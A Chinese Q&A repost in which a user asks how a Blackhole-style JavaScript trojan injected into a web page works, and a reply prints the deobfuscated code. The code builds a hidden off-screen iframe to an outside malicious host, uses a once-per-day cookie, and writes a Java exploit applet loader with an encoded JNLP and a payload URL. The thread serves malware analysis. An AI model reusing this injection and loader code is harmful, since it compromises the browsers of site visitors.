通过XML注释标签(JS / Exploit-Blacole.em)对Javascript进行恶意注入/重定向

lightxx

我最近访问了一个网站,该网站的HTML标记内嵌了JS Trojan。McAfee名称为JS / Exploit-Blacole.em,F-Secure名称为Trojan:JS / Agent,MS名称为Trojan:JS / Quidvetis.A。

现在,出于好奇,我看了看特洛伊木马程序的源代码(仅供参考,我在pastebin上发布了一个副本,请看http://pastebin.com/PsLaE4d9)。

令我惊讶的是McAfee网站(http://home.mcafee.com/virusinfo/virusprofile.aspx?key=1317346#none,单击“病毒特征”选项卡上)上的该部分

同样,此检测使用以下最新注入技术来建立与随机生成的恶意域的连接。 <!--81a338--><!--/81a338-->

木马程序本身似乎在标记中注入了iframe标签,并加载了一些恶意页面。

无论如何,我的问题是,这些XML注释标签起什么作用?肯定有一定理由会在McAfee文章中提及它们吗?此外,是否有可能以某种方式消除对JS代码的混淆并将其转换为人类可读的内容?同样,这只是出于好奇。我只想知道这里发生了什么。

丹尼尔的声誉

在这里看看

http://wepawet.iseclab.org/view.php?hash=86b656e6ad9d7331acc01a80bf89c6b5&type=js

http://jsunpack.jeek.org/?report=87803db7e6a4d9d0b6190cd5054beda64e3784dd

http://urlquery.net/index.php

这些工具将帮助您分析代码

这是完整的已检索且未混淆的代码:

function r09(){
  var static = 'ajax';
  var controller = 'index.php';
  var r = document.createElement('iframe');
  r.src = 'http://ecurie80.hostzi.com/Felenne12/clik.php';
  r.style.position = 'absolute';
  r.style.color = '6675';
  r.style.height = '6675px';
  r.style.width = '6675px';
  r.style.left = '10006675';
  r.style.top = '10006675';
  if (!document.getElementById('r')){
    document.write('<p id=\'r\' class=\'r09\' ></p>');
    document.getElementById('r').appendChild(r);
  }
}
function SetCookie(cookieName, cookieValue, nDays, path){
  var today = new Date();
  var expire = new Date();
  if (nDays == null || nDays == 0)nDays = 1;
  expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
  toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name){
  var start = document.cookie.indexOf(name + "=");
  var len = start + name.length + 1;
  if ((!start) && (name != document.cookie.substring(0, name.length))){
    return null;
  }
  if (start ==  - 1)return null;
  var end = document.cookie.indexOf(";", len);
  if (end ==  - 1)end = document.cookie.length;
  return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled){
  if (GetCookie('visited_uq') == 55){
  }
  else {
    SetCookie('visited_uq', '55', '1', '/');
    r09();
  }
}

这段代码创建了一个iframe并将其推出视图

该代码每天仅使用Cookie运行一次

http://jsunpack.jeek.org/还是许多安全研究人员(例如Brian Krebs?)使用的出色工具。

Iframe会加载Java漏洞并尝试运行它:

 var FPLYKJoQG = {
 WdBxtaXWsGnJRm: function (PseXOSDnXPAXRRnkHZs) {
     var FIZdpsWVSgyPuFKU = document;
     FIZdpsWVSgyPuFKU.write(PseXOSDnXPAXRRnkHZs);
 },
  wWgsxtVAofesbJwDAY: function (xPTKZBm) {
     return xPTKZBm.replace(/355/g, '')
 }
}; 
var SuOmy = FPLYKJoQG.wWgsxtVAofesbJwDAY('355Ja355355355355va355355355355355355355355'); 
var CHHBPE = z.vvv( SuOmy  ).split(','); 
var BZTlEHUaD = FPLYKJoQG.wWgsxtVAofesbJwDAY('355355355355j355355355n355355355355355355355355355355355355355355l355p355355355355355355355355355'); 
var ZNZXaZkfijhQTihemz = FPLYKJoQG.wWgsxtVAofesbJwDAY('355355355355355355355ap355355355355355355355355pl355355355355355355355355355355e355355355355355355t'); 
if (CHHBPE[1] == 7 && CHHBPE[3] > 9) { 
 FPLYKJoQG.WdBxtaXWsGnJRm('<' + ZNZXaZkfijhQTihemz + ' height="10" width="10"><param name="' + BZTlEHUaD + '_href" value="d5xs6x0pt9tk85s.jnlp" /><param name="' + BZTlEHUaD + '_embedded" value="PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4NCj&#120;qbm&#120;wIGhyZWY9ImQ1eHM2eDBwdDl0azg1cy5qbm&#120;wIiBzcGVjPSI&#120;LjAiIHhtbG5zOmpmeD0iaHR0cDovL2phdmFmeC5jb20iPg0KICA8aW5mb3JtYXRpb24+DQogICAgPHRpdG&#120;lPjN5ZE5NQW1PSmlLYlN&#120;RmJZMEl0THM8L3RpdG&#120;lPg0KICAgID&#120;2ZW5kb3I+VzRBcGFXZng&#120;UWwwMXRMbmR1TWFacVpzVG&#120;ISlBBVHF4anhNTWY&#120;RG41PC92ZW5kb3I+DQogIDwvaW5mb3JtYXRpb24+DQogICA8cmVzb3VyY2VzPg0KICAgICAgICA8ajJzZSBocmVmPSJodHRwOi8vamF2YS5zdW4uY29tL3Byb2R1Y3RzL2F1dG9kbC9qMnNlIiB2ZXJzaW9uPSI&#120;LjcrIiAvPg0KICAgICAgICA8amFyIGhyZWY9Ii9nb3NzaXBfdXN1YW&#120;seS5qYXIiIG1haW49InRydWUiIC8+DQogIDwvcmVzb3VyY2VzPg0KICA8YXBwbGV0LWRlc2MgbWFpbi1jbGFzcz0id2pycWZzdHJ2a3d3dG&#120;nLnFqdXRnbXFodHV5cGZqbG1kc3BkYmouY2&#120;hc3MiIG5hbWU9IjB5dW1wMXB4ejlwb3kwIiBoZWlnaHQ9IjEwIiB3aWR0aD0iMTAiPg0KICAgICA8cGFyYW0gbmFtZT0iX19hcHBsZXRfc3N2X3ZhbGlkYXRlZCIgdmFsdWU9InRydWUiIC8+DQogIDwvYXBwbGV0LWRlc2M+DQo8L2pubHA+" /><param name="&#100;uFJfXw" value="http://aussteigende.tommeade.com:1024/sequence-backwards.txt?e=21" /></' + ZNZXaZkfijhQTihemz + '>');
} else {
 FPLYKJoQG.WdBxtaXWsGnJRm('<' + ZNZXaZkfijhQTihemz + '  height="10" code="wjrqfstrvkwwtlg.qjutgmqhtuypfjlmdspdbj.class" archive="/gossip_usually.jar" width="10"><param name="&#100;uFJfXw" value="http://aussteigende.tommeade.com:1024/sequence-backwards.txt?e=21" /></' + ZNZXaZkfijhQTihemz + '>');
}

加载d5xs6x0pt9tk85s.jnlp并执行

<applet height="10" width="10"><param name="jnlp_href" value="d5xs6x0pt9tk85ss.jnlp"><param name="jnlp_embedded" value="PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4NCjxqbmxwIGhyZWY9ImQ1eHM2eDBwdDl0azg1cy5qbmxwIiBzcGVjPSIxLjAiIHhtbG5zOmpmeD0iaHR0cDovL2phdmFmeC5jb20iPg0KICA8aW5mb3JtYXRpb24+DQogICAgPHRpdGxlPjN5ZE5NQW1PSmlLYlNxRmJZMEl0THM8L3RpdGxlPg0KICAgIDx2ZW5kb3I+VzRBcGFXZngxUWwwMXRMbmR1TWFacVpzVGxISlBBVHF4anhNTWYxRG41PC92ZW5kb3I+DQogIDwvaW5mb3JtYXRpb24+DQogICA8cmVzb3VyY2VzPg0KICAgICAgICA8ajJzZSBocmVmPSJodHRwOi8vamF2YS5zdW4uY29tL3Byb2R1Y3RzL2F1dG9kbC9qMnNlIiB2ZXJzaW9uPSIxLjcrIiAvPg0KICAgICAgICA8amFyIGhyZWY9Ii9nb3NzaXBfdXN1YWxseS5qYXIiIG1haW49InRydWUiIC8+DQogIDwvcmVzb3VyY2VzPg0KICA8YXBwbGV0LWRlc2MgbWFpbi1jbGFzcz0id2pycWZzdHJ2a3d3dGxnLnFqdXRnbXFodHV5cGZqbG1kc3BkYmouY2xhc3MiIG5hbWU9IjB5dW1wMXB4ejlwb3kwIiBoZWlnaHQ9IjEwIiB3aWR0aD0iMTAiPg0KICAgICA8cGFyYW0gbmFtZT0iX19hcHBsZXRfc3N2X3ZhbGlkYXRlZCIgdmFsdWU9InRydWUiIC8+DQogIDwvYXBwbGV0LWRlc2M+DQo8L2pubHA+"><param name="duFJfXw" value="http://aussteigende.tommeade.coms:1024/sequence-backwards.txt?e=21"></applet>

或者,如果无法加载,请加载gossip_usually.jar文件并加载/执行wjrqfstrvkwwtlg.qjutgmqhtuypfjlmdspdbj.class:

<applet height="10" code="wjrqfstrvkwwtlg.qjutgmqhtuypfjlmdspdbjs.class" archive="/gossip_usuallys.jar" width="10"><param name="duFJfXw" value="http://aussteigende.tommeades.com:1024/sequence-backwards.txt?e=21"></applet>

本文收集自互联网,转载请注明来源。

如有侵权,请联系[email protected] 删除。

编辑于
0

我来说两句

0条评论
登录后参与评论

相关文章

Related 相关文章

热门标签

归档